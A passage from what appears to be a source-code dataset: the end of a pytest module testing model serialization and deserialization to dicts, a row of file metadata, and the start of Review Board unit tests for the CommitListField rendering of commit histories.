    """Test ``_parse_dict()`` on the model class.

    Serializes ``source`` with ``_to_dict()``, optionally injects
    ``extra_keys`` into the payload, then parses it back with
    ``target._parse_dict()`` and checks the result (or the expected
    warning / error).
    """
    if supports_serialization:
        target = model_complex_postgresql[0]
        source = instance_postgresql[0][0]
    else:
        target = model_single_pk[0]
        source = instance_single_pk[0]
    target.hybrid = hybrid_value

    def build_and_parse():
        # Round-trip: serialize the source, inject extras, parse back.
        input_data = source._to_dict(format,
                                     max_nesting = max_nesting,
                                     current_nesting = current_nesting)
        if extra_keys:
            for key in extra_keys:
                input_data[key] = extra_keys[key]
        return target._parse_dict(input_data,
                                  format,
                                  error_on_extra_keys = error_on_extra_keys,
                                  drop_extra_keys = drop_extra_keys)

    def check_extra_keys(result):
        # Extra keys must be dropped or retained per the flags.
        if not error_on_extra_keys and drop_extra_keys:
            for key in extra_keys:
                assert key not in result
        elif not error_on_extra_keys and not drop_extra_keys:
            for key in extra_keys:
                assert key in result

    if not error and not warning:
        result = build_and_parse()
        check_extra_keys(result)
        assert are_dicts_equivalent(result, expected_result) is True
    elif not warning:
        with pytest.raises(error):
            build_and_parse()
    elif not error:
        with pytest.warns(warning):
            result = build_and_parse()
        assert isinstance(result, dict)
        for key in result:
            assert key in expected_result
            assert expected_result[key] == result[key]
        for key in expected_result:
            assert key in result
            assert result[key] == expected_result[key]
        check_extra_keys(result)
        assert are_dicts_equivalent(result, expected_result) is True
    else:
        # BUGFIX: parameter sets declaring BOTH a warning and an error
        # (e.g. json/yaml + extra keys) fell through the original
        # if/elif chain and asserted nothing. Exercise them: the error
        # must be raised; the warning (if any) is emitted on the way.
        with pytest.raises(error):
            with pytest.warns(warning):
                build_and_parse()
@pytest.mark.parametrize('supports_serialization, hybrid_value, format, max_nesting, current_nesting, expected_result, extra_keys, error_on_extra_keys, drop_extra_keys, warning, error', [
(False, None, 'invalid', 0, 0, None, None, True, False, None, InvalidFormatError),
(False, None, 'dict', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'json', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'yaml', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(False, None, 'csv', 0, 0, None, None, True, False, None, (SerializableAttributeError, DeserializableAttributeError)),
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, None, True, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, None, True, False, None, ValueSerializationError),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 'dict', 1, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': [{ 'nested_key': 'test', 'nested_key2': 'test2' }] }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'json', 1, 0, { 'id': 1, 'name': 'deserialized', 'addresses': [], 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'yaml', 1, 0, { 'id': 1, 'name': 'deserialized', 'addresses': [], 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 'csv', 1, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': { 'nested_key': 'test', 'nested_key2': 'test2' }, 'time_delta': datetime.timedelta(1) }, None, True, False, None, ValueSerializationError),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' } }, None, True, False, None, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' } }, None, True, False, None, None),
# Error on Extra Keys
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, None, ExtraKeyError),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, MaximumNestingExceededWarning, ExtraKeyError),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value' }, { 'extra': 'test' }, True, False, MaximumNestingExceededWarning, ExtraKeyError),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, True, False, None, ExtraKeyError),
# Include Extra Keys in result
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', 'extra': 'test' }, { 'extra': 'test' }, False, False, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'extra': 'test', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, False, False, None, None),
# Exclude Extra Keys from result
(True, 'test value', 'dict', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, None, None),
(True, 'test value', 'json', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, MaximumNestingExceededWarning, None),
(True, 'test value', 'yaml', 0, 0, { 'id': 1, 'name': 'deserialized', 'hybrid': 'test value', }, { 'extra': 'test' }, False, True, MaximumNestingExceededWarning, None),
(True, 'test value', 'csv', 0, 0, { 'id': 1, 'name': 'deserialized', 'smallint_column': 2, 'hybrid': 'test value', 'time_delta': datetime.timedelta(1) }, { 'extra': 'test' }, False, True, None, None),
])
def test_instance__parse_dict(request,
                              instance_single_pk,
                              instance_postgresql,
                              supports_serialization,
                              hybrid_value,
                              format,
                              max_nesting,
                              current_nesting,
                              extra_keys,
                              error_on_extra_keys,
                              drop_extra_keys,
                              expected_result,
                              warning,
                              error):
    """Test ``_parse_dict()`` on a model instance.

    Same round-trip as ``test_model__parse_dict`` except the serializer
    and the parser are the same object (``target``).
    """
    if supports_serialization:
        target = instance_postgresql[0][0]
    else:
        target = instance_single_pk[0]
    target.hybrid = hybrid_value

    def build_and_parse():
        # Round-trip through the instance itself.
        input_data = target._to_dict(format,
                                     max_nesting = max_nesting,
                                     current_nesting = current_nesting)
        if extra_keys:
            for key in extra_keys:
                input_data[key] = extra_keys[key]
        return target._parse_dict(input_data,
                                  format,
                                  error_on_extra_keys = error_on_extra_keys,
                                  drop_extra_keys = drop_extra_keys)

    def check_extra_keys(result):
        # Extra keys must be dropped or retained per the flags.
        if not error_on_extra_keys and drop_extra_keys:
            for key in extra_keys:
                assert key not in result
        elif not error_on_extra_keys and not drop_extra_keys:
            for key in extra_keys:
                assert key in result

    if not error and not warning:
        result = build_and_parse()
        check_extra_keys(result)
        assert are_dicts_equivalent(result, expected_result) is True
    elif not warning:
        with pytest.raises(error):
            build_and_parse()
    elif not error:
        with pytest.warns(warning):
            result = build_and_parse()
        assert isinstance(result, dict)
        for key in result:
            assert key in expected_result
            assert expected_result[key] == result[key]
        for key in expected_result:
            assert key in result
            assert result[key] == expected_result[key]
        check_extra_keys(result)
        assert are_dicts_equivalent(result, expected_result) is True
    else:
        # BUGFIX: parameter sets declaring BOTH a warning and an error
        # (json/yaml extra-key rows) fell through the original if/elif
        # chain and asserted nothing. Exercise them: the error must be
        # raised; the warning (if any) is emitted on the way.
        with pytest.raises(error):
            with pytest.warns(warning):
                build_and_parse()
@pytest.mark.parametrize('supports_serialization, hybrid_value, max_nesting, current_nesting, expected_result, warning, error', [
(False, None, 0, 0, None, None, SerializableAttributeError),
(False, None, 0, 3, None, None, MaximumNestingExceededError),
(True, 'test value', 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': 'test value' }, None, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': 'test', 'nested_key2': 'test2' } }, None, None),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 1, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': [{ 'nested_key': 'test', 'nested_key2': 'test2' }] }, None, None),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' } }, None, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 0, 0, { 'id': 1, 'name': 'serialized', 'hybrid_value': { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' } }, None, None),
])
def test_to_dict(request,
                 instance_single_pk,
                 instance_postgresql,
                 supports_serialization,
                 hybrid_value,
                 max_nesting,
                 current_nesting,
                 expected_result,
                 warning,
                 error):
    """Test the public ``to_dict()`` wrapper (dict format only).

    Three mutually-exclusive outcomes driven by the parametrization:
    clean result compared to ``expected_result``, expected exception,
    or expected warning followed by the comparison.
    """
    if supports_serialization:
        target = instance_postgresql[0][0]
    else:
        target = instance_single_pk[0]
    target.hybrid = hybrid_value

    def serialize():
        # Single call site for the method under test.
        return target.to_dict(max_nesting = max_nesting,
                              current_nesting = current_nesting)

    def assert_matches(actual):
        # The produced dict and the expectation must agree in both directions.
        assert isinstance(actual, dict)
        for item in actual:
            assert item in expected_result
            assert expected_result[item] == actual[item]
        for item in expected_result:
            assert item in actual
            assert actual[item] == expected_result[item]
        assert are_dicts_equivalent(actual, expected_result) is True

    if error is None and warning is None:
        result = serialize()
        assert isinstance(result, dict)
        print('RESULT:')
        print(result)
        print('\nEXPECTED:')
        print(expected_result)
        assert_matches(result)
    elif warning is None:
        with pytest.raises(error):
            serialize()
    elif error is None:
        with pytest.warns(warning):
            result = serialize()
        assert_matches(result)
@pytest.mark.parametrize('supports_serialization, hybrid_value, max_nesting, current_nesting, expected_result, warning, error', [
(False, None, 0, 0, { 'id': 1, '_hybrid': 1, 'hybrid_differentiated': 1, 'name': 'Test Name', 'hybrid': None }, MaximumNestingExceededWarning, None),
(False, None, 0, 3, None, None, MaximumNestingExceededError),
(True, 'test value', 0, 0, {'_hybrid': 1, 'hidden': 'hidden value', 'hybrid': 'test value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1)}, MaximumNestingExceededWarning, None),
(True, { 'nested_key': 'test', 'nested_key2': 'test2' }, 0, 0, { '_hybrid': 1, 'hidden': 'hidden value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, MaximumNestingExceededWarning, None),
(True, [{ 'nested_key': 'test', 'nested_key2': 'test2' }], 1, 0, { '_hybrid': 1, 'addresses': [], 'hidden': 'hidden value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, None, None),
(True, { 'nested_key': {'second-nesting-key': 'test'}, 'nested_key2': 'test2' }, 0, 0, { '_hybrid': 1, 'hidden': 'hidden value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, MaximumNestingExceededWarning, None),
(True, { 'nested_key': {'second-nesting-key': {'third-nest': 3} }, 'nested_key2': 'test2' }, 0, 0, { '_hybrid': 1, 'hidden': 'hidden value', 'hybrid_differentiated': 1, 'id': 1, 'name': 'serialized', 'password': 'test_password', 'smallint_column': 2, 'time_delta': datetime.timedelta(1) }, MaximumNestingExceededWarning, None),
])
def test_dump_to_dict(request,
                      instance_single_pk,
                      instance_postgresql,
                      supports_serialization,
                      hybrid_value,
                      max_nesting,
                      current_nesting,
                      expected_result,
                      warning,
                      error):
    """Test ``dump_to_dict()``, which serializes every column regardless
    of per-attribute serialization settings.

    Outcomes mirror ``test_to_dict``: clean result, expected exception,
    or expected warning followed by the comparison.
    """
    if supports_serialization:
        target = instance_postgresql[0][0]
    else:
        target = instance_single_pk[0]
    target.hybrid = hybrid_value

    def dump():
        # Single call site for the method under test.
        return target.dump_to_dict(max_nesting = max_nesting,
                                   current_nesting = current_nesting)

    def assert_matches(actual):
        # The produced dict and the expectation must agree in both directions.
        assert isinstance(actual, dict)
        for item in actual:
            assert item in expected_result
            assert expected_result[item] == actual[item]
        for item in expected_result:
            assert item in actual
            assert actual[item] == expected_result[item]
        assert are_dicts_equivalent(actual, expected_result) is True

    if error is None and warning is None:
        result = dump()
        assert isinstance(result, dict)
        print('RESULT:')
        print(result)
        print('\nEXPECTED:')
        print(expected_result)
        assert_matches(result)
    elif warning is None:
        with pytest.raises(error):
            dump()
    elif error is None:
        with pytest.warns(warning):
            result = dump()
        assert_matches(result)
@pytest.mark.parametrize('hybrid_value, expected_name, extra_keys, error_on_extra_keys, drop_extra_keys, error', [
('test value', 'deserialized', None, True, False, None),
(123, 'deserialized', None, True, False, None),
('test value', 'deserialized', { 'extra': 'test'}, True, False, ExtraKeyError),
('test value', 'deserialized', { 'extra': 'test'}, False, False, None),
('test value', 'deserialized', { 'extra': 'test'}, False, True, None),
])
def test_update_from_dict(request,
                          model_complex_postgresql,
                          instance_postgresql,
                          hybrid_value,
                          expected_name,
                          extra_keys,
                          error_on_extra_keys,
                          drop_extra_keys,
                          error):
    """Test ``update_from_dict()`` applied in place to a live instance.

    Serializes ``target``, mutates the payload (new hybrid value, optional
    extra keys), then applies it back and verifies the instance state —
    or verifies that the expected error is raised.
    """
    model = model_complex_postgresql[0]
    target = instance_postgresql[0][0]
    # Snapshot the primary key BEFORE the update so we can verify it is
    # not clobbered by the round-trip.
    original_id = target.id
    input_data = target.to_dict(max_nesting = 5,
                                current_nesting = 0)
    input_data['hybrid_value'] = hybrid_value
    if extra_keys:
        for key in extra_keys:
            input_data[key] = extra_keys[key]
    if not error:
        target.update_from_dict(input_data,
                                error_on_extra_keys = error_on_extra_keys,
                                drop_extra_keys = drop_extra_keys)
        assert isinstance(target, model)
        assert getattr(target, 'name') == expected_name
        assert getattr(target, 'hybrid') == hybrid_value
        # BUGFIX: the original asserted ``target.id == target.id`` — a
        # tautology that could never fail. Compare against the value
        # captured before the update instead.
        assert getattr(target, 'id') == original_id
        if extra_keys and not error_on_extra_keys and not drop_extra_keys:
            # Extra keys kept: they must appear as attributes on the target.
            for key in extra_keys:
                assert hasattr(target, key) is True
                assert getattr(target, key) == extra_keys[key]
    else:
        with pytest.raises(error):
            target.update_from_dict(input_data,
                                    error_on_extra_keys = error_on_extra_keys,
                                    drop_extra_keys = drop_extra_keys)
@pytest.mark.parametrize('hybrid_value, expected_name, extra_keys, error_on_extra_keys, drop_extra_keys, error', [
('test value', 'deserialized', None, True, False, None),
(123, 'deserialized', None, True, False, None),
('test value', 'deserialized', { 'extra': 'test'}, True, False, ExtraKeyError),
('test value', 'deserialized', { 'extra': 'test'}, False, False, TypeError),
('test value', 'deserialized', { 'extra': 'test'}, False, True, None),
])
def test_new_from_dict(request,
                       model_complex_postgresql,
                       instance_postgresql,
                       hybrid_value,
                       expected_name,
                       extra_keys,
                       error_on_extra_keys,
                       drop_extra_keys,
                       error):
    """Test ``new_from_dict()`` constructing a fresh model instance.

    Serializes ``source``, mutates the payload (new hybrid value,
    optional extra keys), then builds a new instance from it — or
    verifies that the expected error is raised.
    """
    target = model_complex_postgresql[0]
    source = instance_postgresql[0][0]
    input_data = source.to_dict(max_nesting = 5,
                                current_nesting = 0)
    input_data['hybrid_value'] = hybrid_value
    for key in (extra_keys or {}):
        input_data[key] = extra_keys[key]
    if error:
        with pytest.raises(error):
            target.new_from_dict(input_data,
                                 error_on_extra_keys = error_on_extra_keys,
                                 drop_extra_keys = drop_extra_keys)
    else:
        result = target.new_from_dict(input_data,
                                      error_on_extra_keys = error_on_extra_keys,
                                      drop_extra_keys = drop_extra_keys)
        # The factory must return an instance of the model class itself.
        assert isinstance(result, target)
        assert getattr(result, 'name') == expected_name
        assert getattr(result, 'hybrid') == hybrid_value
        assert getattr(result, 'id') == source.id
        if extra_keys and not error_on_extra_keys and not drop_extra_keys:
            # Extra keys kept: they must appear as attributes on the result.
            for key in extra_keys:
                assert hasattr(result, key) is True
                assert getattr(result, key) == extra_keys[key]
| 59.602917
| 331
| 0.580829
| 4,055
| 36,775
| 5.066338
| 0.033292
| 0.056075
| 0.025896
| 0.027648
| 0.952833
| 0.943585
| 0.937938
| 0.920561
| 0.917299
| 0.908879
| 0
| 0.019001
| 0.268688
| 36,775
| 616
| 332
| 59.699675
| 0.744887
| 0.011366
| 0
| 0.851406
| 0
| 0.004016
| 0.212928
| 0.006632
| 0
| 0
| 0
| 0
| 0.140562
| 1
| 0.014056
| false
| 0.01004
| 0.012048
| 0
| 0.026104
| 0.024096
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e56662f70c7bc54ce14bec5fcb752da7121156f
| 35,401
|
py
|
Python
|
reviewboard/reviews/tests/test_builtin_fields.py
|
amalik2/reviewboard
|
676aa2dce38ce619a74f2d4cb3cfae9bce21416e
|
[
"MIT"
] | 2
|
2020-06-19T14:57:49.000Z
|
2020-06-19T15:17:40.000Z
|
reviewboard/reviews/tests/test_builtin_fields.py
|
amalik2/reviewboard
|
676aa2dce38ce619a74f2d4cb3cfae9bce21416e
|
[
"MIT"
] | 1
|
2019-08-03T01:48:33.000Z
|
2019-08-03T01:48:33.000Z
|
reviewboard/reviews/tests/test_builtin_fields.py
|
amalik2/reviewboard
|
676aa2dce38ce619a74f2d4cb3cfae9bce21416e
|
[
"MIT"
] | null | null | null |
"""Unit tests for reviewboard.reviews.builtin_fields."""
from __future__ import unicode_literals
from django.contrib.auth.models import AnonymousUser, User
from django.core.urlresolvers import resolve
from django.test.client import RequestFactory
from reviewboard.reviews.builtin_fields import CommitListField
from reviewboard.reviews.detail import ReviewRequestPageData
from reviewboard.reviews.models import ReviewRequestDraft
from reviewboard.testing.testcase import TestCase
class CommitListFieldTests(TestCase):
"""Unit tests for CommitListField."""
fixtures = ['test_scmtools', 'test_users']
    def setUp(self):
        """Set up a fresh RequestFactory for each test."""
        super(CommitListFieldTests, self).setUp()
        # Each test builds its own GET request through this factory.
        self.request_factory = RequestFactory()
def test_should_render_history_review_request(self):
"""Testing CommitListField.should_render with a review request created
with history
"""
review_request = self.create_review_request(create_with_history=True)
request = self._build_review_request_get(review_request)
field = CommitListField(review_request, request=request)
self.assertTrue(field.should_render)
def test_should_render_history_draft(self):
"""Testing CommitListField.should_render with a draft of a review
request created with history
"""
review_request = self.create_review_request(create_with_history=True)
draft = ReviewRequestDraft.create(review_request)
request = self._build_review_request_get(review_request)
field = CommitListField(draft, request=request)
self.assertTrue(field.should_render)
def test_should_render_no_history_review_request(self):
"""Testing CommitListField.should_render with a review request created
without history
"""
review_request = self.create_review_request()
request = self._build_review_request_get(review_request)
field = CommitListField(review_request, request=request)
self.assertFalse(field.should_render)
def test_should_render_no_history_draft(self):
"""Testing CommitListField.should_render with a draft of a review
request created without history
"""
review_request = self.create_review_request()
draft = ReviewRequestDraft.create(review_request)
request = self._build_review_request_get(review_request)
field = CommitListField(draft, request=request)
self.assertFalse(field.should_render)
def test_can_record_change_entry_history_review_request(self):
"""Testing CommitListField.can_record_change_entry with a review
request created with history
"""
review_request = self.create_review_request(create_with_history=True)
field = CommitListField(review_request)
self.assertTrue(field.can_record_change_entry)
def test_can_record_change_entry_history_draft(self):
"""Testing CommitListField.can_record_change_entry with a draft of a
review request created with history
"""
review_request = self.create_review_request(create_with_history=True)
draft = ReviewRequestDraft.create(review_request)
field = CommitListField(draft)
self.assertTrue(field.can_record_change_entry)
def test_can_record_change_entry_no_history_review_request(self):
"""Testing CommitListField.can_record_change_entry with a review
request created without history
"""
review_request = self.create_review_request()
field = CommitListField(review_request)
self.assertFalse(field.can_record_change_entry)
def test_can_record_change_entry_no_history_draft(self):
"""Testing CommitListField.can_record_change_entry with a draft of a
review request created without history
"""
review_request = self.create_review_request()
draft = ReviewRequestDraft.create(review_request)
field = CommitListField(draft)
self.assertFalse(field.can_record_change_entry)
def test_render_value(self):
"""Testing CommitListField.render_value"""
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
create_with_history=True)
diffset = self.create_diffset(review_request)
author_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=author_name),
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=author_name)
field = self._make_field(review_request)
result = field.render_value(field.load_value(review_request))
self.assertInHTML('<colgroup><col></colgroup>', result)
self.assertInHTML('<tr><th>Summary</th></tr>', result)
self.assertInHTML(
'<tbody>'
' <tr>'
' <td class="commit-message"><pre>Commit message 1</pre></td>'
' </tr>'
' <tr>'
' <td class="commit-message"><pre>Commit message 2</pre></td>'
' </tr>'
'</tbody>',
result)
def test_render_value_with_author(self):
"""Testing CommitListField.render_value with an author that differs
from the review request submitter
"""
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name='Example Author')
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
field = self._make_field(review_request)
result = field.render_value(field.load_value(review_request))
self.assertInHTML('<colgroup><col><col></colgroup>', result)
self.assertInHTML(
'<tr><th>Summary</th><th>Author</th></tr>',
result)
self.assertInHTML(
'<tbody>'
' <tr>'
' <td class="commit-message"><pre>Commit message 1</pre></td>'
' <td>Example Author</td>'
' </tr>'
' <tr>'
' <td class="commit-message"><pre>Commit message 2</pre></td>'
' <td>%s</td>'
' </tr>'
'</tbody>'
% submitter_name,
result)
def test_render_value_with_collapse(self):
"""Testing CommitListField.render_value with a multi-line commit
message
"""
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
create_with_history=True)
diffset = self.create_diffset(review_request)
author_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=author_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2\n'
'Longer message\n',
author_name=author_name)
field = self._make_field(review_request)
result = field.render_value(field.load_value(review_request))
self.assertInHTML(
'<colgroup>'
' <col class="expand-collapse-control">'
' <col>'
'</colgroup>',
result)
self.assertInHTML('<tr><th colspan="2">Summary</th></tr>', result)
self.assertInHTML(
'<tbody>'
' <tr>'
' <td></td>'
' <td class="commit-message"><pre>Commit message 1</pre></td>'
' </tr>'
' <tr>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="2" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="commit-message"><pre>Commit message 2</pre></td>'
' </tr>'
'</tbody>',
result)
def test_render_value_with_collapse_and_author(self):
"""Testing CommitListField.render_value with an author that differs
from the review request submitter and a multi-line commit message
"""
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name='Example Author')
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2\n'
'Longer message\n',
author_name=submitter_name)
field = self._make_field(review_request)
result = field.render_value(field.load_value(review_request))
self.assertInHTML(
'<colgroup>'
' <col class="expand-collapse-control">'
' <col>'
' <col>'
'</colgroup>',
result)
self.assertInHTML(
'<tr>'
' <th colspan="2">Summary</th>'
' <th>Author</th>'
'</tr>',
result)
self.assertInHTML(
'<tbody>'
' <tr>'
' <td></td>'
' <td class="commit-message"><pre>Commit message 1</pre></td>'
' <td>Example Author</td>'
' </tr>'
' <tr>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="2" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="commit-message"><pre>Commit message 2</pre></td>'
' <td>%s</td>'
' </tr>'
'</tbody>'
% submitter_name,
result)
def test_render_change_entry_html(self):
"""Testing CommitListField.render_change_entry_html"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
author_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=author_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=author_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=author_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2',
author_name=author_name)
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
self.assertInHTML('<colgroup><col><col></colgroup>', result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th>Summary</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 2</pre></td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 1</pre></td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 2</pre></td>'
' </tr>'
'</tbody>',
result)
def test_render_change_entry_html_expand(self):
"""Testing CommitListField.render_change_entry_html with a multi-line
commit message
"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
author_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1\n\n'
'A long message.\n',
author_name=author_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=author_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=author_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2\n\n'
'So very long of a message.\n',
author_name=author_name)
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
